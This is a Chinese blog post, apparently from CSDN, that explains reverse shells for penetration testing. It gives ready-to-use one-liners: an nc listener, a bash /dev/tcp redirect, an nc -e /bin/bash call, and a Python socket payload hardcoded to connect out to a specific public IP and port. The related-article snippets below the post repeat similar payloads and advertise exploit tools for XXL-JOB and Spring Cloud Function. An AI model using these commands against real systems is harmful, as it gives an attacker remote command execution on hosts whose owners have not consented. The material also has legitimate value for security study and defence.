反弹shell

最新推荐文章于 2025-02-15 09:16:15 发布
最新推荐文章于 2025-02-15 09:16:15 发布
阅读量640 收藏
点赞数 1
文章标签: linux 多进程 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ADDPPC/article/details/121565566
版权

反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

为什么要反弹shell?

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。

命令如下:

nc -lvvp port  kali上执行【port为端口】选择一个不用的空端口就行

bash -i >& /dev/tcp/攻击主机ip/port 0>&1【跟上面一样端口】

这样就可以在卡利上面获得cenos的控制权限

nc -lvvp port  kali上执行【port为端口】选择一个不用的空端口就行

 nc -e /bin/bash ip  port centsos

 

 nc -lvvp port  kali上执行【port为端口】选择一个不用的空端口就行

 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("121.5.112.123",1222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Reverseshell:一个反向shell应用程序,用于远程运行系统命令
04-04
反壳 一个反向程序应用程序,用于运行使用套接字和泡菜远程编写的系统命令。
XXL-JOB反弹shell利用工具(xxl-jobExploitGUI)
11-03
工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。(由于传播、利用此资源所提供的信息或者工具而造成的任何直接或者间接的后果及损失,...
Reverse Shell 杂谈
有价值炮灰
12-06 1303
昨天有个小伙伴在群里问在 macOS 下如何实现 bash 反弹 shell,因为 Mac 中没有 `/dev/tcp` 目录。借着这个问题,就来简单谈谈反弹 shell 的那些事。
反弹shell的27种方法 都学会搞定90%的渗透!从零基础到精通,收藏这篇就够了!
最新发布
leah126的博客
02-15 1242
根据目标系统的环境和权限,攻击者可以编写自定义的反弹shell脚本。import oshost ='x.x.x.x'# 攻击者IPport =1234# 监听端口将此脚本上传到目标系统并执行,即可建立反弹shell连接。
linux反弹shell命令解析
weixin_34381687的博客
09-02 120
今天在看spark stream的sample样例的时候看到linux的万金油命令nc。搜索相关的内容突然发现一个很好玩的用处就是反弹shell.下面我们就来讲讲反弹shell 1. 什么是反弹shell 简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。 2. 反弹shell的用途 这个反弹shell大部分用途是用来...
Reverse Shell
qq_67812668的博客
08-07 1219
Reverse shell是一种远程访问技术,其基本原理是让攻击者通过网络连接到受害者电脑的命令行界面或者终端进行操作,而不需要直接访问被攻击者的电脑。攻击者通过将特定的代码注入到受害者电脑中,以建立与其的通信通道,然后与受害者电脑的命令行界面或终端进行交互,达到对其进行控制的目的。Reverse shell通常被黑客用来远程控制被攻击的计算机,执行恶意代码、窃取敏感信息、修改、删除或传输文件、升级权限等行为。
反弹shell命令
Shanfenglan's blog
10-29 2730
文章目录Bash TCPBash UDP:Netcat:Ncat:Telnet:Socat:Perl:Python:PHP:Ruby:OpenSSL:Powershell:Awk:TCLshJava:War:Lua:NodeJS:Groovy:Meterpreter Shell:Xterm: Bash TCP bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 /bin/bash -i > /dev/tcp/127.0.0.1/8080 0&l
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和...反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
Apache-flink 未授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 未授权访问任意jar包上传反弹shell
php反弹shell实现代码
10-30
作者想要简化操作流程,因此选择实现了一个反弹Shell到本地监听端口的功能。文档中还提到该代码是在phpspy2008的基础上进行修改,使其成为一个独立的PHP文件,并且上传到服务器上之后,通过设置好反弹的IP和端口来...
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
反弹shell的命令大全
G3et的博客
03-21 1019
【代码】反弹shell的命令大全。
Linux反弹shell命令
qq_46804551的博客
02-06 283
Linux反弹shell命令 接收端口和发送端端口要一致 bash反弹shell 接收端: nc -lvp 端口 发送端: bash -i >& /dev/tcp/接收端IP/接收端端口 0>&1 python反弹shell 接收端: nc -lvp 端口 发送端: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con
详解反弹shell命令
shy的博客
04-11 3690
在渗透过程中,经常需要反弹shell,因此总结一下linux反弹shell的几种姿势: bash -i >& /dev/tcp/ip/port 0>&1 bash -i本地打开一个bash >& 输出重定向,将标准输出和标准错误输出都重定向到远程。 /dev/tcp/ip/port/建立一个socket连接到另一个机器上,即远程到其他机...
反弹shell常用命令
mirocky的博客
01-15 8831
反弹shell常用命令 1 attacker端的监听——netcat (1) windows环境下下载netcat 下载地址 将如图的nc.exe所在文件夹添加到环境变量 (2) linux环境下下载netcat yum install netcat (3) 安装结束 使用如下命令判断是否安装成功 nc -h 使用如下命令开始监听 nc -lvvp port 2 靶机命令 (1) bash bash一句话为: bash -i >& /dev/tcp/ip/port 0>&a
Reverse-shell WP
qq_41252520的博客
08-09 350
前言 非常感谢子昂师傅分享的wp,从中学习到了一种逆向的思路。 关于此题,我主要打算讲三点: 1.脱壳 2.关键函数该怎么找 3.golang编写的程序的一些特点 分析 【查壳】 64位程序加了UPX壳,我是头一次遇见的,没什么好的工具管用,只能x64gdb手脱。 可是这个程序有些奇怪,一开始断下来的位置并不属于用户态 这点与32位程序加了UPX后的不同。尝试使用ESP定律脱壳,在x64db...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值